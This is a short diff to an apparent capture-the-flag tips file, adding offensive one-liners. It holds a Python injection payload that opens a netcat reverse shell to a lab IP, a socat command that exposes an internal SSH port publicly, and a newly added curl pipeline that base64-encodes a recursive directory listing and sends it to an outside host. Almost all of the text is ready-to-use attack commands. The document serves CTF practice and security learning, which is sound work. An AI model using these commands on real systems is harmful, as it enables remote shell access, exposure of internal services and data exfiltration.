ChrisPritchard/ctf-writeups/TIPS-AND-TRICKS.md

 `__import__('os').popen('nc 10.10.106.5 4444 -e /bin/sh').read()`

-## Exposing a new port to access something internal
+## Other stuff

-E.g. this will expose an internal only port 22 as a public port 8888
+this will expose an internal only port 22 as a public port 8888

 `/tmp/socat tcp-listen:8888,reuseaddr,fork tcp:localhost:22`

+this will exfiltrate command outputs if all you have is the ability to make web requests:

+`ls -laR ../../../ | base64 -w0 | xargs -I T curl 10.10.149.217:1234/?x=T`